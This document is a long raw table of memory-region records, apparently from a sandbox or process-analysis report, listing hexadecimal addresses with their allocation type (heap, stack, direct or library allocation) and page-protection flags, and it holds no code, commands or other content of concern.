C000212000
|
direct allocation
|
page read and write
|
||
7FFAAC790000
|
trusted library allocation
|
page read and write
|
||
236B195A000
|
trusted library allocation
|
page read and write
|
||
70680BB000
|
stack
|
page read and write
|
||
2EE2BEF0000
|
direct allocation
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
2EE2C03E000
|
direct allocation
|
page read and write
|
||
23F4B078000
|
heap
|
page read and write
|
||
2EE2856A000
|
heap
|
page read and write
|
||
4114078000
|
stack
|
page read and write
|
||
AD6BDFE000
|
stack
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
216661A9000
|
heap
|
page read and write
|
||
236AFB7A000
|
heap
|
page read and write
|
||
236B463E000
|
trusted library allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
C00003F000
|
direct allocation
|
page read and write
|
||
7067CFE000
|
stack
|
page read and write
|
||
BB8EBFE000
|
stack
|
page read and write
|
||
21E68B53000
|
heap
|
page read and write
|
||
2EE2C0D0000
|
direct allocation
|
page read and write
|
||
70682BC000
|
stack
|
page read and write
|
||
236B466F000
|
trusted library allocation
|
page read and write
|
||
C00007A000
|
direct allocation
|
page read and write
|
||
23F50655000
|
heap
|
page read and write
|
||
2B3D80F0000
|
heap
|
page read and write
|
||
216660D0000
|
heap
|
page read and write
|
||
2B3C0651000
|
trusted library allocation
|
page read and write
|
||
2B3D7F99000
|
heap
|
page read and write
|
||
20A55F99000
|
heap
|
page read and write
|
||
1DF01E74000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
20A569DE000
|
trusted library allocation
|
page read and write
|
||
216661ED000
|
heap
|
page read and write
|
||
21667B00000
|
heap
|
page read and write
|
||
21666173000
|
heap
|
page read and write
|
||
2B3C163D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
2B3BE274000
|
heap
|
page read and write
|
||
C000023000
|
direct allocation
|
page read and write
|
||
20A54108000
|
heap
|
page read and write
|
||
2B3BE123000
|
heap
|
page read and write
|
||
C00012A000
|
direct allocation
|
page read and write
|
||
411520C000
|
stack
|
page read and write
|
||
236AFA10000
|
heap
|
page read and write
|
||
236B462A000
|
trusted library allocation
|
page read and write
|
||
2B3D80C0000
|
heap
|
page execute and read and write
|
||
21667B40000
|
heap
|
page read and write
|
||
7067F79000
|
stack
|
page read and write
|
||
21E68B44000
|
heap
|
page read and write
|
||
7FFAAC760000
|
trusted library allocation
|
page read and write
|
||
2607373000
|
stack
|
page read and write
|
||
20A6E250000
|
heap
|
page read and write
|
||
2608DCF000
|
stack
|
page read and write
|
||
2EE2BF50000
|
direct allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
236B3B63000
|
trusted library allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
1A3B3EC0000
|
heap
|
page read and write
|
||
23F50600000
|
heap
|
page read and write
|
||
2EE28540000
|
heap
|
page read and write
|
||
7FFAAC6BA000
|
trusted library allocation
|
page read and write
|
||
21E68AD8000
|
heap
|
page read and write
|
||
23F5062C000
|
heap
|
page read and write
|
||
21E68A46000
|
heap
|
page read and write
|
||
1DF1C019000
|
heap
|
page read and write
|
||
2B3BE276000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
21E68A21000
|
heap
|
page read and write
|
||
21667AD0000
|
trusted library allocation
|
page read and write
|
||
216661B7000
|
heap
|
page read and write
|
||
7067DFF000
|
stack
|
page read and write
|
||
21E68B72000
|
heap
|
page read and write
|
||
21E6AC45000
|
heap
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
236B40D0000
|
trusted library allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
2607A36000
|
stack
|
page read and write
|
||
23F50504000
|
trusted library allocation
|
page read and write
|
||
411500B000
|
stack
|
page read and write
|
||
21E68A51000
|
heap
|
page read and write
|
||
2B3D7F78000
|
heap
|
page read and write
|
||
2EE28612000
|
heap
|
page read and write
|
||
BB8EFFE000
|
stack
|
page read and write
|
||
2B3BE020000
|
heap
|
page read and write
|
||
1A3B3D80000
|
heap
|
page read and write
|
||
C000028000
|
direct allocation
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
216661E4000
|
heap
|
page read and write
|
||
21E6CE25000
|
trusted library allocation
|
page read and write
|
||
3277CFF000
|
stack
|
page read and write
|
||
7FFAAC4D6000
|
trusted library allocation
|
page execute and read and write
|
||
1DF04677000
|
trusted library allocation
|
page read and write
|
||
20A580F6000
|
trusted library allocation
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
23F506EA000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
BB8EB7C000
|
stack
|
page read and write
|
||
21E68A60000
|
heap
|
page read and write
|
||
21E68B53000
|
heap
|
page read and write
|
||
1DF1D6BF000
|
unclassified section
|
page read and write
|
||
2B3CFD19000
|
trusted library allocation
|
page read and write
|
||
21E68424000
|
heap
|
page read and write
|
||
20A55AB0000
|
trusted library allocation
|
page read and write
|
||
20A54290000
|
trusted library allocation
|
page read and write
|
||
20A66151000
|
trusted library allocation
|
page read and write
|
||
20A57780000
|
trusted library allocation
|
page read and write
|
||
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
2166620E000
|
heap
|
page read and write
|
||
21E68A46000
|
heap
|
page read and write
|
||
1DF01CAC000
|
heap
|
page read and write
|
||
2608CCE000
|
stack
|
page read and write
|
||
2EE28619000
|
heap
|
page read and write
|
||
20A570A9000
|
trusted library allocation
|
page read and write
|
||
21E68996000
|
heap
|
page read and write
|
||
20A54092000
|
heap
|
page read and write
|
||
1DF1C1F0000
|
direct allocation
|
page read and write
|
||
21E6845E000
|
heap
|
page read and write
|
||
C000018000
|
direct allocation
|
page read and write
|
||
21E67EA7000
|
heap
|
page read and write
|
||
21E68B68000
|
heap
|
page read and write
|
||
7067EFD000
|
stack
|
page read and write
|
||
AD6C0FE000
|
stack
|
page read and write
|
||
23F505F0000
|
trusted library allocation
|
page read and write
|
||
AD6B37E000
|
stack
|
page read and write
|
||
C00022C000
|
direct allocation
|
page read and write
|
||
2EE28580000
|
heap
|
page read and write
|
||
236B4039000
|
trusted library allocation
|
page read and write
|
||
23F506F4000
|
heap
|
page read and write
|
||
6FB7CFD000
|
unkown
|
page read and write
|
||
C000068000
|
direct allocation
|
page read and write
|
||
236B5013000
|
trusted library allocation
|
page read and write
|
||
236B3B6B000
|
trusted library allocation
|
page read and write
|
||
20A57FE2000
|
trusted library allocation
|
page read and write
|
||
C00004F000
|
direct allocation
|
page read and write
|
||
2B93F2F000
|
stack
|
page read and write
|
||
7FFAAC5B0000
|
trusted library allocation
|
page execute and read and write
|
||
1C828450000
|
heap
|
page read and write
|
||
AD6B87E000
|
unkown
|
page readonly
|
||
1DF1D6F1000
|
unclassified section
|
page read and write
|
||
21E6AC56000
|
heap
|
page read and write
|
||
236B41CE000
|
trusted library allocation
|
page read and write
|
||
1DF03DA7000
|
trusted library allocation
|
page read and write
|
||
BB8F07E000
|
stack
|
page read and write
|
||
7FFAAC720000
|
trusted library allocation
|
page read and write
|
||
1DF1C198000
|
direct allocation
|
page read and write
|
||
4113F79000
|
stack
|
page read and write
|
||
7FFAAC820000
|
trusted library allocation
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
1DF01C62000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
C00013C000
|
direct allocation
|
page read and write
|
||
20A66171000
|
trusted library allocation
|
page read and write
|
||
21E6899A000
|
heap
|
page read and write
|
||
7FFAAC591000
|
trusted library allocation
|
page read and write
|
||
411530B000
|
stack
|
page read and write
|
||
2B3BE0E3000
|
heap
|
page read and write
|
||
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
1DF03DB9000
|
trusted library allocation
|
page read and write
|
||
21E6843C000
|
heap
|
page read and write
|
||
C000014000
|
direct allocation
|
page read and write
|
||
20A5738F000
|
trusted library allocation
|
page read and write
|
||
2B3D81F8000
|
heap
|
page read and write
|
||
2EE2857E000
|
heap
|
page read and write
|
||
7FFAAC7D0000
|
trusted library allocation
|
page read and write
|
||
F7FA9FF000
|
stack
|
page read and write
|
||
1DF1D6BB000
|
unclassified section
|
page read and write
|
||
1C8285C0000
|
heap
|
page read and write
|
||
2EE2BD50000
|
direct allocation
|
page read and write
|
||
7FFAAC5E0000
|
trusted library allocation
|
page read and write
|
||
2EE2BD70000
|
direct allocation
|
page read and write
|
||
2C388C48000
|
heap
|
page read and write
|
||
1DF03DB1000
|
trusted library allocation
|
page read and write
|
||
2EE285A4000
|
heap
|
page read and write
|
||
21E68B9A000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
23F4BD40000
|
trusted library allocation
|
page read and write
|
||
23F4B113000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
FD77CF7000
|
stack
|
page read and write
|
||
2B3C12BB000
|
trusted library allocation
|
page read and write
|
||
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
21E68B34000
|
heap
|
page read and write
|
||
20A6E153000
|
heap
|
page read and write
|
||
4114ECD000
|
stack
|
page read and write
|
||
411510C000
|
stack
|
page read and write
|
||
236B37C6000
|
trusted library allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFAAC5C2000
|
trusted library allocation
|
page read and write
|
||
1DF01CBE000
|
heap
|
page read and write
|
||
7FFAAC940000
|
trusted library allocation
|
page read and write
|
||
2EE285F2000
|
heap
|
page read and write
|
||
21E68424000
|
heap
|
page read and write
|
||
236B3B4F000
|
trusted library allocation
|
page read and write
|
||
20A561D8000
|
trusted library allocation
|
page read and write
|
||
AD6C87C000
|
stack
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
21E68A9A000
|
heap
|
page read and write
|
||
1DF01CE4000
|
heap
|
page read and write
|
||
236B15A0000
|
heap
|
page read and write
|
||
20A54010000
|
heap
|
page read and write
|
||
2B3C102D000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5B6000
|
trusted library allocation
|
page read and write
|
||
21E6899F000
|
heap
|
page read and write
|
||
21E68996000
|
heap
|
page read and write
|
||
20A6E3D9000
|
heap
|
page read and write
|
||
21E68A1D000
|
heap
|
page read and write
|
||
23F50700000
|
heap
|
page read and write
|
||
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
21E68420000
|
heap
|
page read and write
|
||
20A540DF000
|
heap
|
page read and write
|
||
706833E000
|
stack
|
page read and write
|
||
1F2C7F90000
|
heap
|
page read and write
|
||
7FFAAC950000
|
trusted library allocation
|
page read and write
|
||
2607CBC000
|
stack
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
20A6E412000
|
heap
|
page read and write
|
||
1DF62CF0000
|
direct allocation
|
page read and write
|
||
216661A9000
|
heap
|
page read and write
|
||
21E6843E000
|
heap
|
page read and write
|
||
236B4162000
|
trusted library allocation
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
C00043C000
|
direct allocation
|
page read and write
|
||
21E67E90000
|
heap
|
page read and write
|
||
236B469F000
|
trusted library allocation
|
page read and write
|
||
4113EFE000
|
stack
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
2EE2BED0000
|
direct allocation
|
page read and write
|
||
21E68ABC000
|
heap
|
page read and write
|
||
2B3BE060000
|
heap
|
page read and write
|
||
AD6C77E000
|
unkown
|
page readonly
|
||
21E68C1B000
|
heap
|
page read and write
|
||
C00045C000
|
direct allocation
|
page read and write
|
||
AD6BCFE000
|
stack
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
21E68455000
|
heap
|
page read and write
|
||
21E68B74000
|
heap
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
21E68A7A000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
AD6C47E000
|
unkown
|
page readonly
|
||
2EE2859A000
|
heap
|
page read and write
|
||
1DF03750000
|
trusted library allocation
|
page read and write
|
||
C000010000
|
direct allocation
|
page read and write
|
||
21E689AA000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
2EE28583000
|
heap
|
page read and write
|
||
7FFAAC500000
|
trusted library allocation
|
page execute and read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
2166620D000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
21E6844C000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
1DF1BFEF000
|
heap
|
page read and write
|
||
236B1483000
|
trusted library allocation
|
page read and write
|
||
236B53E0000
|
trusted library allocation
|
page read and write
|
||
7DF453CC0000
|
trusted library allocation
|
page execute and read and write
|
||
1C828430000
|
heap
|
page read and write
|
||
236B460F000
|
trusted library allocation
|
page read and write
|
||
21E689C7000
|
heap
|
page read and write
|
||
20A6E4C2000
|
heap
|
page read and write
|
||
21666195000
|
heap
|
page read and write
|
||
216660E0000
|
heap
|
page read and write
|
||
1C828350000
|
heap
|
page read and write
|
||
6FB7EFD000
|
stack
|
page read and write
|
||
F8C13AC000
|
stack
|
page read and write
|
||
41141F9000
|
stack
|
page read and write
|
||
2EE2859E000
|
heap
|
page read and write
|
||
7FFB1E3A0000
|
unkown
|
page readonly
|
||
FD77EFF000
|
stack
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
23F4C0D0000
|
trusted library section
|
page readonly
|
||
1DF1D6F6000
|
unclassified section
|
page write copy
|
||
21E68438000
|
heap
|
page read and write
|
||
1A3B3CA0000
|
heap
|
page read and write
|
||
2EE2BDF0000
|
direct allocation
|
page read and write
|
||
236B3733000
|
trusted library allocation
|
page read and write
|
||
21E68A7F000
|
heap
|
page read and write
|
||
2B3D7F6F000
|
heap
|
page read and write
|
||
21666173000
|
heap
|
page read and write
|
||
2EE28581000
|
heap
|
page read and write
|
||
23F5061F000
|
heap
|
page read and write
|
||
2EE285EF000
|
heap
|
page read and write
|
||
20A566FA000
|
trusted library allocation
|
page read and write
|
||
2B3BE0D9000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
C000082000
|
direct allocation
|
page read and write
|
||
2EE2BDD0000
|
direct allocation
|
page read and write
|
||
21E68444000
|
heap
|
page read and write
|
||
2EE2BEB0000
|
direct allocation
|
page read and write
|
||
7FFAAC868000
|
trusted library allocation
|
page read and write
|
||
23F4C0C0000
|
trusted library section
|
page readonly
|
||
216661EF000
|
heap
|
page read and write
|
||
260894F000
|
stack
|
page read and write
|
||
1DF1BFDB000
|
heap
|
page read and write
|
||
1DF1C035000
|
heap
|
page read and write
|
||
21E68BB5000
|
heap
|
page read and write
|
||
2EE29F80000
|
direct allocation
|
page read and write
|
||
2EE28730000
|
heap
|
page read and write
|
||
2B3BE240000
|
heap
|
page execute and read and write
|
||
2B3BE000000
|
heap
|
page read and write
|
||
2EE285C8000
|
heap
|
page read and write
|
||
2C388C40000
|
heap
|
page read and write
|
||
20A55C40000
|
heap
|
page read and write
|
||
2B3BE128000
|
heap
|
page read and write
|
||
7FFAAC5F0000
|
trusted library allocation
|
page read and write
|
||
2B3C1573000
|
trusted library allocation
|
page read and write
|
||
21E68438000
|
heap
|
page read and write
|
||
21666151000
|
heap
|
page read and write
|
||
7FFAAC4C6000
|
trusted library allocation
|
page execute and read and write
|
||
21E689A4000
|
heap
|
page read and write
|
||
23F50519000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3C5000
|
unkown
|
page readonly
|
||
21E68444000
|
heap
|
page read and write
|
||
2608C4E000
|
stack
|
page read and write
|
||
7FFAAC970000
|
trusted library allocation
|
page read and write
|
||
21E68A66000
|
heap
|
page read and write
|
||
1DF1C057000
|
heap
|
page read and write
|
||
2C388DE0000
|
heap
|
page read and write
|
||
236B373B000
|
trusted library allocation
|
page read and write
|
||
1DF03A30000
|
heap
|
page read and write
|
||
7FFB1E3B9000
|
unkown
|
page readonly
|
||
C000400000
|
direct allocation
|
page read and write
|
||
C000140000
|
direct allocation
|
page read and write
|
||
AD6C57E000
|
stack
|
page read and write
|
||
70678C3000
|
stack
|
page read and write
|
||
C000450000
|
direct allocation
|
page read and write
|
||
1DF03660000
|
heap
|
page read and write
|
||
C0004AA000
|
direct allocation
|
page read and write
|
||
21E68B6F000
|
heap
|
page read and write
|
||
236B1ACC000
|
trusted library allocation
|
page read and write
|
||
23F50620000
|
trusted library allocation
|
page read and write
|
||
236B24D9000
|
trusted library allocation
|
page read and write
|
||
7FFAAC770000
|
trusted library allocation
|
page read and write
|
||
20A542C0000
|
heap
|
page readonly
|
||
2B3D8603000
|
heap
|
page read and write
|
||
236B45CA000
|
trusted library allocation
|
page read and write
|
||
21E68B9D000
|
heap
|
page read and write
|
||
21E689C2000
|
heap
|
page read and write
|
||
2EE2BE10000
|
direct allocation
|
page read and write
|
||
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
1DF03DD2000
|
trusted library allocation
|
page read and write
|
||
21E68441000
|
heap
|
page read and write
|
||
21E68434000
|
heap
|
page read and write
|
||
21E68C0A000
|
heap
|
page read and write
|
||
2B3BFC51000
|
trusted library allocation
|
page read and write
|
||
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
C000042000
|
direct allocation
|
page read and write
|
||
20A54250000
|
heap
|
page read and write
|
||
1DF01CA0000
|
heap
|
page read and write
|
||
7FFAAC73C000
|
trusted library allocation
|
page read and write
|
||
20A6E4A6000
|
heap
|
page read and write
|
||
21667B4D000
|
heap
|
page read and write
|
||
AD6D2FE000
|
stack
|
page read and write
|
||
2EE285D0000
|
heap
|
page read and write
|
||
C00004B000
|
direct allocation
|
page read and write
|
||
70679CE000
|
stack
|
page read and write
|
||
1DF1C3C0000
|
direct allocation
|
page execute and read and write
|
||
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
AD6C5FE000
|
stack
|
page read and write
|
||
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
21E6844C000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
7FFAAC750000
|
trusted library allocation
|
page read and write
|
||
AD6BB7E000
|
unkown
|
page readonly
|
||
260777D000
|
stack
|
page read and write
|
||
236B41D0000
|
trusted library allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
32779FD000
|
stack
|
page read and write
|
||
7FFAAC5DA000
|
trusted library allocation
|
page read and write
|
||
2EE2C0B0000
|
direct allocation
|
page read and write
|
||
7FFAAC854000
|
trusted library allocation
|
page read and write
|
||
21E68A63000
|
heap
|
page read and write
|
||
26089CA000
|
stack
|
page read and write
|
||
C00021D000
|
direct allocation
|
page read and write
|
||
2E7C79F0000
|
heap
|
page read and write
|
||
1DF1C039000
|
heap
|
page read and write
|
||
C000060000
|
direct allocation
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
7FFAAC780000
|
trusted library allocation
|
page read and write
|
||
21E68AAB000
|
heap
|
page read and write
|
||
C00016C000
|
direct allocation
|
page read and write
|
||
2B3D8030000
|
heap
|
page execute and read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFAAC600000
|
trusted library allocation
|
page read and write
|
||
7FFAAC5D2000
|
trusted library allocation
|
page read and write
|
||
23F50500000
|
trusted library allocation
|
page read and write
|
||
21E68B64000
|
heap
|
page read and write
|
||
21E6AC40000
|
heap
|
page read and write
|
||
BB8F0FB000
|
stack
|
page read and write
|
||
2EE2BE50000
|
direct allocation
|
page read and write
|
||
23F504C0000
|
trusted library allocation
|
page read and write
|
||
20A54106000
|
heap
|
page read and write
|
||
21E68921000
|
heap
|
page read and write
|
||
7FFAAC660000
|
trusted library allocation
|
page read and write
|
||
2B93EAC000
|
stack
|
page read and write
|
||
20A6E236000
|
heap
|
page read and write
|
||
1DF62CB5000
|
direct allocation
|
page read and write
|
||
2607BBF000
|
stack
|
page read and write
|
||
236AFBB8000
|
heap
|
page read and write
|
||
7067D79000
|
stack
|
page read and write
|
||
7FFAAC3E4000
|
trusted library allocation
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
2EE2BDB0000
|
direct allocation
|
page read and write
|
||
2EE28549000
|
heap
|
page read and write
|
||
236AFB8C000
|
heap
|
page read and write
|
||
2607B39000
|
stack
|
page read and write
|
||
21E68AB9000
|
heap
|
page read and write
|
||
21E689F4000
|
heap
|
page read and write
|
||
21E68B24000
|
heap
|
page read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
1A3B5850000
|
heap
|
page read and write
|
||
23F5065F000
|
heap
|
page read and write
|
||
2EE2857E000
|
heap
|
page read and write
|
||
706823E000
|
stack
|
page read and write
|
||
C000004000
|
direct allocation
|
page read and write
|
||
1DF13A41000
|
trusted library allocation
|
page read and write
|
||
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
2EE2BE30000
|
direct allocation
|
page read and write
|
||
21E68998000
|
heap
|
page read and write
|
||
E339EFF000
|
stack
|
page read and write
|
||
23F4B95A000
|
heap
|
page read and write
|
||
1DF01E80000
|
heap
|
page read and write
|
||
2A801E30000
|
heap
|
page read and write
|
||
23F506FB000
|
heap
|
page read and write
|
||
2E7C78F0000
|
heap
|
page read and write
|
||
236B345A000
|
trusted library allocation
|
page read and write
|
||
4113C73000
|
stack
|
page read and write
|
||
7FFAAC4A6000
|
trusted library allocation
|
page read and write
|
||
23F50500000
|
trusted library allocation
|
page read and write
|
||
4113DFE000
|
stack
|
page read and write
|
||
236B5455000
|
trusted library allocation
|
page read and write
|
||
FD77DFE000
|
stack
|
page read and write
|
||
2166611F000
|
heap
|
page read and write
|
||
2EE285F9000
|
heap
|
page read and write
|
||
21E68B4A000
|
heap
|
page read and write
|
||
236B4582000
|
trusted library allocation
|
page read and write
|
||
7FFB167B0000
|
unkown
|
page read and write
|
||
7FFAAC3FD000
|
trusted library allocation
|
page execute and read and write
|
||
1A3B3E99000
|
heap
|
page read and write
|
||
20A6E1C9000
|
heap
|
page read and write
|
||
2B3D8238000
|
heap
|
page read and write
|
||
2EE2BE90000
|
direct allocation
|
page read and write
|
||
236B45B0000
|
trusted library allocation
|
page read and write
|
||
C000098000
|
direct allocation
|
page read and write
|
||
21E68A0F000
|
heap
|
page read and write
|
||
2B3D82C4000
|
heap
|
page read and write
|
||
20A55C30000
|
trusted library allocation
|
page read and write
|
||
7FFB16791000
|
unkown
|
page execute read
|
||
21E68C02000
|
heap
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
2B3BE1F0000
|
trusted library allocation
|
page read and write
|
||
23F4BED0000
|
trusted library allocation
|
page read and write
|
||
C00005C000
|
direct allocation
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
1DF039C0000
|
heap
|
page execute and read and write
|
||
C0001A2000
|
direct allocation
|
page read and write
|
||
21E68B30000
|
heap
|
page read and write
|
||
6FB7DFE000
|
stack
|
page read and write
|
||
20A55B50000
|
heap
|
page execute and read and write
|
||
23F4B670000
|
trusted library allocation
|
page read and write
|
||
2EE285D1000
|
heap
|
page read and write
|
||
20A55C44000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
236B45DE000
|
trusted library allocation
|
page read and write
|
||
C000148000
|
direct allocation
|
page read and write
|
||
20A56B98000
|
trusted library allocation
|
page read and write
|
||
216661A1000
|
heap
|
page read and write
|
||
21E68B44000
|
heap
|
page read and write
|
||
7FFAAC5C5000
|
trusted library allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
C0004C4000
|
direct allocation
|
page read and write
|
||
AD6B67E000
|
unkown
|
page readonly
|
||
2B3D7F96000
|
heap
|
page read and write
|
||
2EE28561000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
21E68A60000
|
heap
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
21E68BAA000
|
heap
|
page read and write
|
||
236B414E000
|
trusted library allocation
|
page read and write
|
||
236B4030000
|
trusted library allocation
|
page read and write
|
||
2EE2857E000
|
heap
|
page read and write
|
||
2EE28600000
|
heap
|
page read and write
|
||
C000086000
|
direct allocation
|
page read and write
|
||
2608A4D000
|
stack
|
page read and write
|
||
2EE2861A000
|
heap
|
page read and write
|
||
FD77FFE000
|
stack
|
page read and write
|
||
7FFAAC7E0000
|
trusted library allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
7FFAAC490000
|
trusted library allocation
|
page read and write
|
||
23F4C0B0000
|
trusted library section
|
page readonly
|
||
2EE29F60000
|
direct allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
C00003D000
|
direct allocation
|
page read and write
|
||
2C388C50000
|
heap
|
page read and write
|
||
21E68942000
|
heap
|
page read and write
|
||
23F50704000
|
heap
|
page read and write
|
||
AD6C07E000
|
unkown
|
page readonly
|
||
21E68973000
|
heap
|
page read and write
|
||
2B3D8710000
|
heap
|
page read and write
|
||
236B45E0000
|
trusted library allocation
|
page read and write
|
||
21E68C00000
|
heap
|
page read and write
|
||
2B3D8700000
|
heap
|
page read and write
|
||
23F504C0000
|
trusted library allocation
|
page read and write
|
||
1DF01D70000
|
heap
|
page read and write
|
||
23F4B02B000
|
heap
|
page read and write
|
||
2EE28619000
|
heap
|
page read and write
|
||
2EE2C0E5000
|
direct allocation
|
page read and write
|
||
1DF1DA97000
|
unclassified section
|
page read and write
|
||
1DF62D71000
|
direct allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
C000142000
|
direct allocation
|
page read and write
|
||
23F4B102000
|
heap
|
page read and write
|
||
1DF15869000
|
trusted library allocation
|
page read and write
|
||
21E6899F000
|
heap
|
page read and write
|
||
21E68BF5000
|
heap
|
page read and write
|
||
C000516000
|
direct allocation
|
page read and write
|
||
20A57CAE000
|
trusted library allocation
|
page read and write
|
||
20A56140000
|
heap
|
page execute and read and write
|
||
7FFAAC740000
|
trusted library allocation
|
page read and write
|
||
2EE2BFD0000
|
direct allocation
|
page read and write
|
||
2B3D85A0000
|
trusted library section
|
page read and write
|
||
21E68455000
|
heap
|
page read and write
|
||
7FFAAC7A0000
|
trusted library allocation
|
page read and write
|
||
2B3BE1C0000
|
trusted library allocation
|
page read and write
|
||
411540A000
|
stack
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
C00021F000
|
direct allocation
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
1DF03C68000
|
trusted library allocation
|
page read and write
|
||
7FFAAC51B000
|
trusted library allocation
|
page read and write
|
||
7068E0E000
|
stack
|
page read and write
|
||
2EE285F7000
|
heap
|
page read and write
|
||
1DF1CB60000
|
direct allocation
|
page read and write
|
||
21E6845E000
|
heap
|
page read and write
|
||
2EE28610000
|
heap
|
page read and write
|
||
20A572BD000
|
trusted library allocation
|
page read and write
|
||
C000156000
|
direct allocation
|
page read and write
|
||
1DF14469000
|
trusted library allocation
|
page read and write
|
||
21E68BF8000
|
heap
|
page read and write
|
||
21E68B75000
|
heap
|
page read and write
|
||
7FFAAC4B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFAAC5C0000
|
trusted library allocation
|
page execute and read and write
|
||
20A6E3F6000
|
heap
|
page read and write
|
||
1A3B3EBE000
|
heap
|
page read and write
|
||
20A540BE000
|
heap
|
page read and write
|
||
7FFB1E3C0000
|
unkown
|
page read and write
|
||
1DF03A41000
|
trusted library allocation
|
page read and write
|
||
216661C6000
|
heap
|
page read and write
|
||
2607978000
|
stack
|
page read and write
|
||
1DF1BD80000
|
heap
|
page read and write
|
||
20A56151000
|
trusted library allocation
|
page read and write
|
||
7FFAAC640000
|
trusted library allocation
|
page read and write
|
||
2B3C10BF000
|
trusted library allocation
|
page read and write
|
||
1DF03E6F000
|
trusted library allocation
|
page read and write
|
||
2EE2BF90000
|
direct allocation
|
page read and write
|
||
20A6E4EC000
|
heap
|
page read and write
|
||
7068037000
|
stack
|
page read and write
|
||
1A3B3E70000
|
heap
|
page read and write
|
||
2EE2858C000
|
heap
|
page read and write
|
||
23F4C440000
|
trusted library allocation
|
page read and write
|
||
2EE285EE000
|
heap
|
page read and write
|
||
23F504B0000
|
trusted library allocation
|
page read and write
|
||
C00009A000
|
direct allocation
|
page read and write
|
||
2EE285FB000
|
heap
|
page read and write
|
||
C000146000
|
direct allocation
|
page read and write
|
||
C000221000
|
direct allocation
|
page read and write
|
||
1DF1D6C3000
|
unclassified section
|
page write copy
|
||
2EE2BF27000
|
direct allocation
|
page read and write
|
||
21E68B4D000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
7FFAAC592000
|
trusted library allocation
|
page read and write
|
||
20A542D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC503000
|
trusted library allocation
|
page execute and read and write
|
||
21666195000
|
heap
|
page read and write
|
||
2B3BE250000
|
heap
|
page read and write
|
||
21E68C02000
|
heap
|
page read and write
|
||
21E68434000
|
heap
|
page read and write
|
||
2B3BE0E5000
|
heap
|
page read and write
|
||
21E68C1B000
|
heap
|
page read and write
|
||
21E68BF1000
|
heap
|
page read and write
|
||
7FFB167B2000
|
unkown
|
page readonly
|
||
1DF03790000
|
heap
|
page execute and read and write
|
||
23F4B0B7000
|
heap
|
page read and write
|
||
